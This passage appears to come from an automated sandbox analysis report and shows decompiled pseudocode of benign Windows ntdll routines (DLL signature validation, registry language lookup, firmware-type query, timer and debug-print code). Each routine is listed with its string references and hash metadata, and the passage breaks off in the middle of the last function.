                                                                            • LdrpDoPostSnapWork , xrefs: 01119C1E
                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x , xrefs: 01119C18
                                                                            • minkernel\ntdll\ldrsnap.c , xrefs: 01119C28
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 2994545307-1948996284
                                                                            • Opcode ID: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                                            • Instruction ID: 73874d2587d934a539b0a4a15e4d56a3774b6ad689fdb452dbfd0b5a82c87acf
                                                                            • Opcode Fuzzy Hash: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                                            • Instruction Fuzzy Hash: 6B911631A0020AAFDF58DF59D880ABEBBF5FF40B14B4481AED985AB544E730E945CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                                                                                  E010C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { 				char _v8; 				intOrPtr _v12; 				intOrPtr _v16; 				intOrPtr _v20; 				char _v24; 				signed int _t73; 				void* _t77; 				char* _t82; 				char* _t87; 				signed char* _t97; 				signed char _t102; 				intOrPtr _t107; 				signed char* _t108; 				intOrPtr _t112; 				intOrPtr _t124; 				intOrPtr _t125; 				intOrPtr _t126;  				_t107 = __edx; 				_v12 = __ecx; 				_t125 =  *((intOrPtr*)(__ecx + 0x20)); 				_t124 = 0; 				_v20 = __edx; 				if(E010CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) { 					_t112 = _v8; 				} else { 					_t112 = 0; 					_v8 = 0; 				} 				if(_t112 != 0) { 					if(( *(_v12 + 0x10) & 0x00800000) != 0) { 						_t124 = 0xc000007b; 						goto L8; 					} 					_t73 =  *(_t125 + 0x34) | 0x00400000; 					 *(_t125 + 0x34) = _t73; 					if(( *(_t112 + 0x10) & 0x00000001) == 0) { 						goto L3; 					} 					 *(_t125 + 0x34) = _t73 | 0x01000000; 					_t124 = E010BC9A4( *((intOrPtr*)(_t125 + 0x18))); 					if(_t124 < 0) { 						goto L8; 					} else { 						goto L3; 					} 				} else { 					L3: 					if(( *(_t107 + 0x16) & 0x00002000) == 0) { 						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb; 						L8: 						return _t124; 					} 					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) { 						if(( *(_t107 + 0x5e) & 0x00000080) != 0) { 							goto L5; 						} 						_t102 =  *0x11a5780; // 0x0 						if((_t102 & 0x00000003) != 0) { 							E01135510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24); 							_t102 =  *0x11a5780; // 0x0 						} 						if((_t102 & 0x00000010) != 0) { 							asm("int3"); 						} 						_t124 = 0xc0000428; 						goto L8; 					} 					L5: 					if(( *(_t125 + 0x34) & 0x01000000) != 0) { 						goto L8; 					} 					_t77 = _a4 - 
0x40000003; 					if(_t77 == 0 || _t77 == 0x33) { 						_v16 =  *((intOrPtr*)(_t125 + 0x18)); 						if(E010D7D50() != 0) { 							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 						} else { 							_t82 = 0x7ffe0384; 						} 						_t108 = 0x7ffe0385; 						if( *_t82 != 0) { 							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) { 								if(E010D7D50() == 0) { 									_t97 = 0x7ffe0385; 								} else { 									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; 								} 								if(( *_t97 & 0x00000020) != 0) { 									E01137016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0); 								} 							} 						} 						if(_a4 != 0x40000003) { 							L14: 							_t126 =  *((intOrPtr*)(_t125 + 0x18)); 							if(E010D7D50() != 0) { 								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 							} else { 								_t87 = 0x7ffe0384; 							} 							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) { 								if(E010D7D50() != 0) { 									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; 								} 								if(( *_t108 & 0x00000020) != 0) { 									E01137016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0); 								} 							} 							goto L8; 						} else { 							_v16 = _t125 + 0x24; 							_t124 = E010EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24); 							if(_t124 < 0) { 								E010BB1E1(_t124, 0x1490, 0, _v16); 								goto L8; 							} 							goto L14; 						} 					} else { 						goto L8; 					} 				} 			}                        

                                                                            Strings
                                                                            • LdrpCompleteMapModule , xrefs: 01119898
                                                                            • Could not validate the crypto signature for DLL %wZ , xrefs: 01119891
                                                                            • minkernel\ntdll\ldrmap.c , xrefs: 011198A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                            • API String ID: 0-1676968949
                                                                            • Opcode ID: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                                            • Instruction ID: 78cfbce50914f63f5a4e4152af38e43a7d5ba3f0d6966685b5710864c7ba80ac
                                                                            • Opcode Fuzzy Hash: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                                            • Instruction Fuzzy Hash: B451243260074ADBEB2ACB5DC954B6EBBE4AB05B18F0405ADE9A19B3D5D730ED00CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                                                                                  E010BE620(void* __ecx, short* __edx, short* _a4) { 				char _v16; 				char _v20; 				intOrPtr _v24; 				char* _v28; 				char _v32; 				char _v36; 				char _v44; 				signed int _v48; 				intOrPtr _v52; 				void* _v56; 				void* _v60; 				char _v64; 				void* _v68; 				void* _v76; 				void* _v84; 				signed int _t59; 				signed int _t74; 				signed short* _t75; 				signed int _t76; 				signed short* _t78; 				signed int _t83; 				short* _t93; 				signed short* _t94; 				short* _t96; 				void* _t97; 				signed int _t99; 				void* _t101; 				void* _t102;  				_t80 = __ecx; 				_t101 = (_t99 & 0xfffffff8) - 0x34; 				_t96 = __edx; 				_v44 = __edx; 				_t78 = 0; 				_v56 = 0; 				if(__ecx == 0 || __edx == 0) { 					L28: 					_t97 = 0xc000000d; 				} else { 					_t93 = _a4; 					if(_t93 == 0) { 						goto L28; 					} 					_t78 = E010BF358(__ecx, 0xac); 					if(_t78 == 0) { 						_t97 = 0xc0000017; 						L6: 						if(_v56 != 0) { 							_push(_v56); 							E010F95D0(); 						} 						if(_t78 != 0) { 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78); 						} 						return _t97; 					} 					E010FFA60(_t78, 0, 0x158); 					_v48 = _v48 & 0x00000000; 					_t102 = _t101 + 0xc; 					 *_t96 = 0; 					 *_t93 = 0; 					E010FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language"); 					_v36 = 0x18; 					_v28 =  &_v44; 					_v64 = 0; 					_push( &_v36); 					_push(0x20019); 					_v32 = 0; 					_push( &_v64); 					_v24 = 0x40; 					_v20 = 0; 					_v16 = 0; 					_t97 = E010F9600(); 					if(_t97 < 0) { 						goto L6; 					} 					E010FBB40(0,  &_v36, L"InstallLanguageFallback"); 					_push(0); 					_v48 = 4; 					_t97 = L010BF018(_v64,  &_v44,  &_v56, _t78,  &_v48); 					if(_t97 >= 0) { 						if(_v52 != 1) { 							L17: 							_t97 = 0xc0000001; 							goto L6; 						} 						_t59 =  *_t78 & 0x0000ffff; 						
_t94 = _t78; 						_t83 = _t59; 						if(_t59 == 0) { 							L19: 							if(_t83 == 0) { 								L23: 								E010FBB40(_t83, _t102 + 0x24, _t78); 								if(L010C43C0( &_v48,  &_v64) == 0) { 									goto L17; 								} 								_t84 = _v48; 								 *_v48 = _v56; 								if( *_t94 != 0) { 									E010FBB40(_t84, _t102 + 0x24, _t94); 									if(L010C43C0( &_v48,  &_v64) != 0) { 										 *_a4 = _v56; 									} else { 										_t97 = 0xc0000001; 										 *_v48 = 0; 									} 								} 								goto L6; 							} 							_t83 = _t83 & 0x0000ffff; 							while(_t83 == 0x20) { 								_t94 =  &(_t94[1]); 								_t74 =  *_t94 & 0x0000ffff; 								_t83 = _t74; 								if(_t74 != 0) { 									continue; 								} 								goto L23; 							} 							goto L23; 						} else { 							goto L14; 						} 						while(1) { 							L14: 							_t27 =  &(_t94[1]); // 0x2 							_t75 = _t27; 							if(_t83 == 0x2c) { 								break; 							} 							_t94 = _t75; 							_t76 =  *_t94 & 0x0000ffff; 							_t83 = _t76; 							if(_t76 != 0) { 								continue; 							} 							goto L23; 						} 						 *_t94 = 0; 						_t94 = _t75; 						_t83 =  *_t75 & 0x0000ffff; 						goto L19; 					} 				} 			}                        

                                                                            Strings
                                                                            • InstallLanguageFallback , xrefs: 010BE6DB
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language , xrefs: 010BE68C
                                                                            • @ , xrefs: 010BE6C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1757540487
                                                                            • Opcode ID: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                                            • Instruction ID: 5c433435fd827ebf4c44a846dda3a873a7e379341cec5ca1dd07d2f460d8b457
                                                                            • Opcode Fuzzy Hash: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                                            • Instruction Fuzzy Hash: 5051B1725083069BD754DF68C480AABB7E9BF89614F05092EFAC5E7640F734D904CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                                                                                  E011351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { 				signed short* _t63; 				signed int _t64; 				signed int _t65; 				signed int _t67; 				intOrPtr _t74; 				intOrPtr _t84; 				intOrPtr _t88; 				intOrPtr _t94; 				void* _t100; 				void* _t103; 				intOrPtr _t105; 				signed int _t106; 				short* _t108; 				signed int _t110; 				signed int _t113; 				signed int* _t115; 				signed short* _t117; 				void* _t118; 				void* _t119;  				_push(0x80); 				_push(0x11905f0); 				E0110D0E8(__ebx, __edi, __esi); 				 *((intOrPtr*)(_t118 - 0x80)) = __edx; 				_t115 =  *(_t118 + 0xc); 				 *(_t118 - 0x7c) = _t115; 				 *((char*)(_t118 - 0x65)) = 0; 				 *((intOrPtr*)(_t118 - 0x64)) = 0; 				_t113 = 0; 				 *((intOrPtr*)(_t118 - 0x6c)) = 0; 				 *((intOrPtr*)(_t118 - 4)) = 0; 				_t100 = __ecx; 				if(_t100 == 0) { 					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24; 					E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); 					 *((char*)(_t118 - 0x65)) = 1; 					_t63 =  *(_t118 - 0x90); 					_t101 = _t63[2]; 					_t64 =  *_t63 & 0x0000ffff; 					_t113 =  *((intOrPtr*)(_t118 - 0x6c)); 					L20: 					_t65 = _t64 >> 1; 					L21: 					_t108 =  *((intOrPtr*)(_t118 - 0x80)); 					if(_t108 == 0) { 						L27: 						 *_t115 = _t65 + 1; 						_t67 = 0xc0000023; 						L28: 						 *((intOrPtr*)(_t118 - 0x64)) = _t67; 						L29: 						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe; 						E011353CA(0); 						return E0110D130(0, _t113, _t115); 					} 					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) { 						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) { 							 *_t108 = 0; 						} 						goto L27; 					} 					 *_t115 = _t65; 					_t115 = _t65 + _t65; 					E010FF3E0(_t108, _t101, _t115); 					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0; 					_t67 = 0; 					goto L28; 				} 				_t103 = _t100 - 1; 				
if(_t103 == 0) { 					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38; 					_t74 = E010D3690(1, _t117, 0x1091810, _t118 - 0x74); 					 *((intOrPtr*)(_t118 - 0x64)) = _t74; 					_t101 = _t117[2]; 					_t113 =  *((intOrPtr*)(_t118 - 0x6c)); 					if(_t74 < 0) { 						_t64 =  *_t117 & 0x0000ffff; 						_t115 =  *(_t118 - 0x7c); 						goto L20; 					} 					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1; 					_t115 =  *(_t118 - 0x7c); 					goto L21; 				} 				if(_t103 == 1) { 					_t105 = 4; 					 *((intOrPtr*)(_t118 - 0x78)) = _t105; 					 *((intOrPtr*)(_t118 - 0x70)) = 0; 					_push(_t118 - 0x70); 					_push(0); 					_push(0); 					_push(_t105); 					_push(_t118 - 0x78); 					_push(0x6b); 					 *((intOrPtr*)(_t118 - 0x64)) = E010FAA90(); 					 *((intOrPtr*)(_t118 - 0x64)) = 0; 					_t113 = L010D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70))); 					 *((intOrPtr*)(_t118 - 0x6c)) = _t113; 					if(_t113 != 0) { 						_push(_t118 - 0x70); 						_push( *((intOrPtr*)(_t118 - 0x70))); 						_push(_t113); 						_push(4); 						_push(_t118 - 0x78); 						_push(0x6b); 						_t84 = E010FAA90(); 						 *((intOrPtr*)(_t118 - 0x64)) = _t84; 						if(_t84 < 0) { 							goto L29; 						} 						_t110 = 0; 						_t106 = 0; 						while(1) { 							 *((intOrPtr*)(_t118 - 0x84)) = _t110; 							 *(_t118 - 0x88) = _t106; 							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) { 								break; 							} 							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff); 							_t106 = _t106 + 1; 						} 						_t88 = E0113500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110); 						_t119 = _t119 + 0x1c; 						 *((intOrPtr*)(_t118 - 0x64)) = _t88; 						if(_t88 < 0) { 							goto L29; 						} 						_t101 = _t118 - 0x3c; 						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1; 						goto L21; 					} 					_t67 = 0xc0000017; 					goto L28; 				} 				_push(0); 				_push(0x20); 				_push(_t118 - 0x60); 				_push(0x5a); 				_t94 = E010F9860(); 	
			 *((intOrPtr*)(_t118 - 0x64)) = _t94; 				if(_t94 < 0) { 					goto L29; 				} 				if( *((intOrPtr*)(_t118 - 0x50)) == 1) { 					_t101 = L"Legacy"; 					_push(6); 				} else { 					_t101 = L"UEFI"; 					_push(4); 				} 				_pop(_t65); 				goto L21; 			}                        


                                                                            Strings
                                                                            • Legacy , xrefs: 01135226
                                                                            • UEFI , xrefs: 0113521D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: Legacy$UEFI
                                                                            • API String ID: 2994545307-634100481
                                                                            • Opcode ID: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                                            • Instruction ID: bb510a83412911ba654c978ae5fe5b71eb590f6e7dd4469b2c62aa1a96218713
                                                                            • Opcode Fuzzy Hash: a5761e2c6a0d545f7a7fab6f55de0bc653e07faeb6d690732624ab77a10060cc
                                                                            • Instruction Fuzzy Hash: FD517C71E04609DFDB68DFA8C990BAEBBF9FB88B00F14402DE649EB255D7719900CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                                                                                  E010DB944(signed int* __ecx, char __edx) { 				signed int _v8; 				signed int _v16; 				signed int _v20; 				char _v28; 				signed int _v32; 				char _v36; 				signed int _v40; 				intOrPtr _v44; 				signed int* _v48; 				signed int _v52; 				signed int _v56; 				intOrPtr _v60; 				intOrPtr _v64; 				intOrPtr _v68; 				intOrPtr _v72; 				intOrPtr _v76; 				char _v77; 				void* __ebx; 				void* __edi; 				void* __esi; 				intOrPtr* _t65; 				intOrPtr _t67; 				intOrPtr _t68; 				char* _t73; 				intOrPtr _t77; 				intOrPtr _t78; 				signed int _t82; 				intOrPtr _t83; 				void* _t87; 				char _t88; 				intOrPtr* _t89; 				intOrPtr _t91; 				void* _t97; 				intOrPtr _t100; 				void* _t102; 				void* _t107; 				signed int _t108; 				intOrPtr* _t112; 				void* _t113; 				intOrPtr* _t114; 				intOrPtr _t115; 				intOrPtr _t116; 				intOrPtr _t117; 				signed int _t118; 				void* _t130;  				_t120 = (_t118 & 0xfffffff8) - 0x4c; 				_v8 =  *0x11ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c; 				_t112 = __ecx; 				_v77 = __edx; 				_v48 = __ecx; 				_v28 = 0; 				_t5 = _t112 + 0xc; // 0x575651ff 				_t105 =  *_t5; 				_v20 = 0; 				_v16 = 0; 				if(_t105 == 0) { 					_t50 = _t112 + 4; // 0x5de58b5b 					_t60 =  *__ecx |  *_t50; 					if(( *__ecx |  *_t50) != 0) { 						 *__ecx = 0; 						__ecx[1] = 0; 						if(E010D7D50() != 0) { 							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; 						} else { 							_t65 = 0x7ffe0386; 						} 						if( *_t65 != 0) { 							E01188CD6(_t112); 						} 						_push(0); 						_t52 = _t112 + 0x10; // 0x778df98b 						_push( *_t52); 						_t60 = E010F9E20(); 					} 					L20: 					_pop(_t107); 					_pop(_t113); 					_pop(_t87); 					return E010FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113); 				} 				_t8 = _t112 + 8; // 0x8b000cc2 				_t67 =  *_t8; 				_t88 =  *((intOrPtr*)(_t67 + 0x10)); 				_t97 =  
*((intOrPtr*)(_t105 + 0x10)) - _t88; 				_t108 =  *(_t67 + 0x14); 				_t68 =  *((intOrPtr*)(_t105 + 0x14)); 				_t105 = 0x2710; 				asm("sbb eax, edi"); 				_v44 = _t88; 				_v52 = _t108; 				_t60 = E010FCE00(_t97, _t68, 0x2710, 0); 				_v56 = _t60; 				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) { 					L3: 					 *(_t112 + 0x44) = _t60; 					_t105 = _t60 * 0x2710 >> 0x20; 					 *_t112 = _t88; 					 *(_t112 + 4) = _t108; 					_v20 = _t60 * 0x2710; 					_v16 = _t60 * 0x2710 >> 0x20; 					if(_v77 != 0) { 						L16: 						_v36 = _t88; 						_v32 = _t108; 						if(E010D7D50() != 0) { 							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c; 						} else { 							_t73 = 0x7ffe0386; 						} 						if( *_t73 != 0) { 							_t105 = _v40; 							E01188F6A(_t112, _v40, _t88, _t108); 						} 						_push( &_v28); 						_push(0); 						_push( &_v36); 						_t48 = _t112 + 0x10; // 0x778df98b 						_push( *_t48); 						_t60 = E010FAF60(); 						goto L20; 					} else { 						_t89 = 0x7ffe03b0; 						do { 							_t114 = 0x7ffe0010; 							do { 								_t77 =  *0x11a8628; // 0x0 								_v68 = _t77; 								_t78 =  *0x11a862c; // 0x0 								_v64 = _t78; 								_v72 =  *_t89; 								_v76 =  *((intOrPtr*)(_t89 + 4)); 								while(1) { 									_t105 =  *0x7ffe000c; 									_t100 =  *0x7ffe0008; 									if(_t105 ==  *_t114) { 										goto L8; 									} 									asm("pause"); 								} 								L8: 								_t89 = 0x7ffe03b0; 								_t115 =  *0x7ffe03b0; 								_t82 =  *0x7FFE03B4; 								_v60 = _t115; 								_t114 = 0x7ffe0010; 								_v56 = _t82; 							} while (_v72 != _t115 || _v76 != _t82); 							_t83 =  *0x11a8628; // 0x0 							_t116 =  *0x11a862c; // 0x0 							_v76 = _t116; 							_t117 = _v68; 						} while (_t117 != _t83 || _v64 != _v76); 						asm("sbb edx, [esp+0x24]"); 						_t102 = _t100 - _v60 - _t117; 						_t112 = _v48; 						_t91 = _v44; 						asm("sbb edx, eax"); 						_t130 = _t105 - _v52; 						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) { 							
_t88 = _t102 - _t91; 							asm("sbb edx, edi"); 							_t108 = _t105; 						} else { 							_t88 = 0; 							_t108 = 0; 						} 						goto L16; 					} 				} else { 					if( *(_t112 + 0x44) == _t60) { 						goto L20; 					} 					goto L3; 				} 			}                        


                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010DB9A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 885266447-0
                                                                            • Opcode ID: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                                            • Instruction ID: 221897eb62ae8f374644b1f36e1bb63744a1a9748532fb2b8023e56d32f8c48e
                                                                            • Opcode Fuzzy Hash: 201e99ef7798c92912d3fbcee0957a4c2877fe97159ac331ef6c33ba229b1660
                                                                            • Instruction Fuzzy Hash: 10515571A08341CFC724DF2DC08092ABBE5BB89610F56896EFAD987345DB70E844CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                                                                                  E010BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) { 				signed int _t65; 				signed short _t69; 				intOrPtr _t70; 				signed short _t85; 				void* _t86; 				signed short _t89; 				signed short _t91; 				intOrPtr _t92; 				intOrPtr _t97; 				intOrPtr* _t98; 				signed short _t99; 				signed short _t101; 				void* _t102; 				char* _t103; 				signed short _t104; 				intOrPtr* _t110; 				void* _t111; 				void* _t114; 				intOrPtr* _t115;  				_t109 = __esi; 				_t108 = __edi; 				_t106 = __edx; 				_t95 = __ebx; 				_push(0x90); 				_push(0x118f7a8); 				E0110D0E8(__ebx, __edi, __esi); 				 *((intOrPtr*)(_t114 - 0x9c)) = __edx; 				 *((intOrPtr*)(_t114 - 0x84)) = __ecx; 				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc)); 				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10)); 				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18]; 				if(__edx == 0xffffffff) { 					L6: 					_t97 =  *((intOrPtr*)(_t114 - 0x78)); 					_t65 =  *(_t97 + 0xfca) & 0x0000ffff; 					__eflags = _t65 & 0x00000002; 					if((_t65 & 0x00000002) != 0) { 						L3: 						L4: 						return E0110D130(_t95, _t108, _t109); 					} 					 *(_t97 + 0xfca) = _t65 | 0x00000002; 					_t108 = 0; 					_t109 = 0; 					_t95 = 0; 					__eflags = 0; 					while(1) { 						__eflags = _t95 - 0x200; 						if(_t95 >= 0x200) { 							break; 						} 						E010FD000(0x80); 						 *((intOrPtr*)(_t114 - 0x18)) = _t115; 						_t108 = _t115; 						_t95 = _t95 - 0xffffff80; 						_t17 = _t114 - 4; 						 *_t17 =  *(_t114 - 4) & 0x00000000; 						__eflags =  *_t17; 						_t106 =  *((intOrPtr*)(_t114 - 0x84)); 						_t110 =  *((intOrPtr*)(_t114 - 0x84)); 						_t102 = _t110 + 1; 						do { 							_t85 =  *_t110; 							_t110 = _t110 + 1; 							__eflags = _t85; 						} while (_t85 != 0); 						_t111 = _t110 - _t102; 						
_t21 = _t95 - 1; // -129 						_t86 = _t21; 						__eflags = _t111 - _t86; 						if(_t111 > _t86) { 							_t111 = _t86; 						} 						E010FF3E0(_t108, _t106, _t111); 						_t115 = _t115 + 0xc; 						_t103 = _t111 + _t108; 						 *((intOrPtr*)(_t114 - 0x80)) = _t103; 						_t89 = _t95 - _t111; 						__eflags = _t89; 						_push(0); 						if(_t89 == 0) { 							L15: 							_t109 = 0xc000000d; 							goto L16; 						} else { 							__eflags = _t89 - 0x7fffffff; 							if(_t89 <= 0x7fffffff) { 								L16: 								 *(_t114 - 0x94) = _t109; 								__eflags = _t109; 								if(_t109 < 0) { 									__eflags = _t89; 									if(_t89 != 0) { 										 *_t103 = 0; 									} 									L26: 									 *(_t114 - 0xa0) = _t109; 									 *(_t114 - 4) = 0xfffffffe; 									__eflags = _t109; 									if(_t109 >= 0) { 										L31: 										_t98 = _t108; 										_t39 = _t98 + 1; // 0x1 										_t106 = _t39; 										do { 											_t69 =  *_t98; 											_t98 = _t98 + 1; 											__eflags = _t69; 										} while (_t69 != 0); 										_t99 = _t98 - _t106; 										__eflags = _t99; 										L34: 										_t70 =  *[fs:0x30]; 										__eflags =  *((char*)(_t70 + 2)); 										if( *((char*)(_t70 + 2)) != 0) { 											L40: 											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006; 											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000; 											 *((intOrPtr*)(_t114 - 0x64)) = 2; 											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000; 											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1; 											 *((intOrPtr*)(_t114 - 0x5c)) = _t108; 											 *(_t114 - 4) = 1; 											_push(_t114 - 0x74); 											L0110DEF0(_t99, _t106); 											 *(_t114 - 4) = 0xfffffffe; 											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd; 											goto L3; 										} 										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3; 										if(( *0x7ffe02d4 & 0x00000003) != 3) { 											goto L40; 								
		} 										_push( *((intOrPtr*)(_t114 + 8))); 										_push( *((intOrPtr*)(_t114 - 0x9c))); 										_push(_t99 & 0x0000ffff); 										_push(_t108); 										_push(1); 										_t101 = E010FB280(); 										__eflags =  *((char*)(_t114 + 0x14)) - 1; 										if( *((char*)(_t114 + 0x14)) == 1) { 											__eflags = _t101 - 0x80000003; 											if(_t101 == 0x80000003) { 												E010FB7E0(1); 												_t101 = 0; 												__eflags = 0; 											} 										} 										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd; 										goto L4; 									} 									__eflags = _t109 - 0x80000005; 									if(_t109 == 0x80000005) { 										continue; 									} 									break; 								} 								 *(_t114 - 0x90) = 0; 								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1; 								_t91 = E010FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88))); 								_t115 = _t115 + 0x10; 								_t104 = _t91; 								_t92 =  *((intOrPtr*)(_t114 - 0x7c)); 								__eflags = _t104; 								if(_t104 < 0) { 									L21: 									_t109 = 0x80000005; 									 *(_t114 - 0x90) = 0x80000005; 									L22: 									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0; 									L23: 									 *(_t114 - 0x94) = _t109; 									goto L26; 								} 								__eflags = _t104 - _t92; 								if(__eflags > 0) { 									goto L21; 								} 								if(__eflags == 0) { 									goto L22; 								} 								goto L23; 							} 							goto L15; 						} 					} 					__eflags = _t109; 					if(_t109 >= 0) { 						goto L31; 					} 					__eflags = _t109 - 0x80000005; 					if(_t109 != 0x80000005) { 						goto L31; 					} 					 *((short*)(_t95 + _t108 - 2)) = 0xa; 					_t38 = _t95 - 1; // -129 					_t99 = _t38; 					goto L34; 				} 				if( *((char*)( *[fs:0x30] + 2)) != 0) { 					__eflags = __edx - 0x65; 					if(__edx != 0x65) { 						goto L2; 					